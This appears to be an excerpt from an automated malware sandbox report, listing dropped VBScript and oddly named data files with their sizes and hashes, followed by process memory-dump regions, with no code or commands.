5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fhrdes.vbe
Filesize
897KB

MD5
f7c23aeac3f19f73ebfe79dbb84d808c

SHA1
f18bc0ad7670937d6b0e84b6c0ce160e224c413c

SHA256
d0d0d1e16d669d4bb0144be39bb051466a13ac49f1d6b511bc5e01f97fb1ef04

SHA512
93726075a891f4eb06bc6f0aebd767c621897c3bb8b74ad154ce1b563e9bcc7c6bfcc443d72ce18af610692bbc48c3c3e33326f493c6c2f023f93d4c87bf69a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\hqwokv.vbe
Filesize
895KB

MD5
f847b87ef0f1c65c439d6248420898bb

SHA1
b3516456c320b30cc3021056990f346a1aefa97f

SHA256
86cb9f5449f63d8e17ec0db74c9bb7d6397325682f0db55fd7277af48dd8af8e

SHA512
02ff51f7a536c8303626f7f06d58ad1baeffe8add2dfe2cad7036f29935d52d08e2c3aab0787f0df4fd1e30de15dfa4d0e14a96290a4bfaa41897c92f7f9ec47

Download Submit
C:\Users\Admin\AppData\Local\Temp\mlakoo.vbe
Filesize
896KB

MD5
f1d487d507b6b841db8b7b72bd9ee442

SHA1
8be4ecbd352ea9717b73cda28108a5a72f1e28b7

SHA256
0026871fae17c91b3441af1af102d8867ddd3ca3f0ddf5cbb53be6ddf53de290

SHA512
91b8a1399b92c4258cfa6ce27a68723a19352012c5532cdb3273305f7fa3b3a238359c1a6264472f5cae437edc7afc7745d22e1ade09e04d7ebf5847c553331e

Download Submit
C:\Users\Admin\AppData\Local\Temp\qydsfb.vbs
Filesize
896KB

MD5
a23d773c6c93d0bba764db86493570d4

SHA1
9da15fb723169e043bb5926d6bc3403ccaad6e51

SHA256
cd78e7668754fafbdfac6e3a2b7289fd29567aed422c6e99fc0a2098aabfd95c

SHA512
64808f1312ddafeab520dc97f4a7dadcfbe451b77a3c4c4118dd3659f9569c3430f0c0d0b5cc329e508af01182077d916dc0cf967837aa0998417d0807e34c7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\vjrogx.vbe
Filesize
896KB

MD5
dbe5866bb55d72813066600716474395

SHA1
671ddef8c1f04b8981e808f8c64233c89c8ed7fd

SHA256
46c622b14a31028da2b382e2676f47992f5384693aa3638165dcb02454fb5ef7

SHA512
b40c2fd0d7fec197b41801624d4e6de7b376838fcd792abc82ea8c385d7443be73728e92cbba55dbfca2baafdf13b6b585f7c498e0b2af782dd8fdc377574abf

Download Submit
C:\Users\Admin\AppData\Roaming\Akenbold.udf
Filesize
470KB

MD5
9907859839a3497c173f34aed72fb95b

SHA1
c09d532c8da1843fd6732cf3e6f88e002ca95cbc

SHA256
353243dd7fe8466cc1a1b9cf2140d47ac924d36db8663d7292386655a9b952d8

SHA512
9857d4af415bdedae45988f8da84dc6d31f879152f8f0f95b719a2883215237f3c12d141c0fcfeb7c2e19096cb640bd24f99100f73136bbe301ccf0d223f5dba

Download Submit
C:\Users\Admin\AppData\Roaming\Hematobranchiate.Enf
Filesize
434KB

MD5
4793cc65deb23421dfd47920a6311bc9

SHA1
435b5a895bc9304e339476588df0563a578589d2

SHA256
f125443ed252b92d97b8a85580335392dd7bdaaee0158fb7632639dcfe4ea4e7

SHA512
14807ad5a90bc7e6882f88ff7321f06495a5018337cf744bfe75b21fbe7b4914344fc70eae0bfcae4ee869f9126bfca5757583ca7a565957a1ff8f5f389d4f86

Download Submit
C:\Users\Admin\AppData\Roaming\Indtastningernes.Voi
Filesize
419KB

MD5
b2cfc3953c18131bd516f8d98b3b160a

SHA1
c80d15ea3dbc080c42ad0f57c1ffcc8fb4592776

SHA256
0618f3348168e845c6ee63628cc1ca4a74fc409af9fae6d63785babae682e678

SHA512
7f9bf761938cbdecd0636cc9074e0d4018556cca126ef780ee0fd5da4ff8f585c3e2dba2723474f2742d0bf6a3bb165d7beef80593e847edfcdbec6fbb7e1dd3

Download Submit
C:\Users\Admin\AppData\Roaming\Profitratens.Sha
Filesize
404KB

MD5
2261b71ddd0a2d57f61659810aaf0087

SHA1
6ab877a1acbed1c2ac07a6c482be418a6a17c331

SHA256
9a2687a64eee6a875adb5c11e9bd472249146240963bff6631faf9c20d6f215d

SHA512
f5a3c9216140ff6550de57f46de95415cdd9d71f48c73c257d537219dd7581b2018c017cad51ca7db68d7422138c0267b04c900b1834312c30d05f35940ae7c8

Download Submit
C:\Users\Admin\AppData\Roaming\Sorbet.Unb
Filesize
419KB

MD5
1c3f2054bb5bc90f98bcc6be6f0eca04

SHA1
8c2b8b87cca9b76fd64523746d202024082498ce

SHA256
8ff469d50c3017539faed1d5ee3d1adb9cd13aeabee0a3eccfed3b2a3d632d34

SHA512
c00cb6396adaa2a44212d1c3b7f654fde4eeb82e10883439ce4e16447ed1d5b8b654adb59d8913ee0acfe4b5d1be2583a383fe9cb14dc14d97845b73d378c119

Download Submit
C:\Users\Admin\AppData\Roaming\Tuberculotoxin.Mul
Filesize
418KB

MD5
d1ef38bf067b0d5dece155564218aa60

SHA1
f1dc20b9c2a4aaccd3c71a2f66bc204d34adc344

SHA256
3cf7ddb0a966f99737c33b4da7fce30c79a84f17247d9d3084ff89356a2b5424

SHA512
83bb58c4b93d28f2eca5e835917c0901fe27362b832b0ebd9514f6d952f405645e694ef0b6ed72fc78992ad4b877ea06a8d44a672c85633697dfe5e25b4364ec

Download Submit
memory/428-47-0x0000000000ED0000-0x0000000000EDE000-memory.dmp

Filesize
56KB

Download
memory/428-48-0x00000000237F0000-0x000000002388C000-memory.dmp

Filesize
624KB

Download
memory/428-46-0x0000000000ED0000-0x0000000002124000-memory.dmp

Filesize
18.3MB

Download
memory/428-55-0x0000000023AA0000-0x0000000023B32000-memory.dmp

Filesize
584KB

Download
memory/428-56-0x00000000239D0000-0x00000000239DA000-memory.dmp

Filesize
40KB

Download
memory/676-151-0x00000000086E0000-0x000000000D9D2000-memory.dmp

Filesize
82.9MB

Download
memory/1576-146-0x0000000000BD0000-0x0000000001E24000-memory.dmp

Filesize
18.3MB

Download
memory/1576-34-0x0000000007460000-0x00000000074F6000-memory.dmp

Filesize
600KB

Download
memory/1576-15-0x00000000028B0000-0x00000000028E6000-memory.dmp

Filesize
216KB

Download
memory/1576-29-0x0000000005BE0000-0x0000000005F34000-memory.dmp

Filesize
3.3MB

Download
memory/1576-38-0x0000000008BF0000-0x000000000C0E8000-memory.dmp

Filesize
53.0MB

Download
memory/1576-36-0x0000000008640000-0x0000000008BE4000-memory.dmp

Filesize
5.6MB

Download
memory/1576-30-0x00000000061B0000-0x00000000061CE000-memory.dmp

Filesize
120KB

Download
memory/1576-31-0x0000000006250000-0x000000000629C000-memory.dmp

Filesize
304KB

Download
memory/1576-35-0x00000000073F0000-0x0000000007412000-memory.dmp

Filesize
136KB

Download
memory/1576-16-0x0000000005490000-0x0000000005AB8000-memory.dmp

Filesize
6.2MB

Download
memory/1576-33-0x0000000006740000-0x000000000675A000-memory.dmp

Filesize
104KB

Download
memory/1576-19-0x0000000005B70000-0x0000000005BD6000-memory.dmp

Filesize
408KB

Download
memory/1576-147-0x0000000000BD0000-0x0000000000BDE000-memory.dmp

Filesize
56KB

Download
memory/1576-32-0x0000000007A10000-0x000000000808A000-memory.dmp

Filesize
6.5MB

Download
memory/1576-18-0x0000000005420000-0x0000000005486000-memory.dmp

Filesize
408KB

Download
memory/1576-17-0x0000000005300000-0x0000000005322000-memory.dmp

Filesize
136KB

Download
memory/2360-128-0x00000000089E0000-0x000000000C0A3000-memory.dmp

Filesize
54.8MB

Download
memory/2528-73-0x0000000005B90000-0x0000000005BDC000-memory.dmp

Filesize
304KB

Download
memory/2528-62-0x0000000005530000-0x0000000005884000-memory.dmp

Filesize
3.3MB

Download
memory/2696-1-0x0000021273B90000-0x0000021273BB2000-memory.dmp

Filesize
136KB

Download
memory/2696-12-0x00007FFE59E30000-0x00007FFE5A8F1000-memory.dmp

Filesize
10.8MB

Download
memory/2696-11-0x00007FFE59E30000-0x00007FFE5A8F1000-memory.dmp

Filesize
10.8MB

Download
memory/2696-0-0x00007FFE59E33000-0x00007FFE59E35000-memory.dmp

Filesize
8KB

Download
memory/2696-51-0x00007FFE59E30000-0x00007FFE5A8F1000-memory.dmp

Filesize
10.8MB

Download
memory/3284-195-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3284-189-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3284-193-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3284-191-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3284-187-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3284-185-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3284-183-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3284-181-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3284-179-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3284-177-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3284-175-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3284-173-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3284-171-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3284-197-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3284-170-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3284-167-0x0000000000E00000-0x0000000002054000-memory.dmp

Filesize
18.3MB

Download
memory/3284-169-0x00000000234F0000-0x00000000235CC000-memory.dmp

Filesize
880KB

Download
memory/3284-199-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3284-203-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3284-155-0x0000000000E00000-0x0000000002054000-memory.dmp

Filesize
18.3MB

Download
memory/3284-168-0x0000000000E00000-0x0000000000E74000-memory.dmp

Filesize
464KB

Download
memory/3284-205-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3284-201-0x00000000234F0000-0x00000000235C7000-memory.dmp

Filesize
860KB

Download
memory/3892-126-0x0000000008EF0000-0x000000000BBBE000-memory.dmp

Filesize
44.8MB

Download
memory/4136-160-0x0000000000BD0000-0x0000000001E24000-memory.dmp

Filesize
18.3MB

Download
memory/6624-6476-0x0000000006250000-0x000000000629C000-memory.dmp

Filesize
304KB

Download
memory/6624-6474-0x0000000005CB0000-0x0000000006004000-memory.dmp

Filesize
3.3MB

Download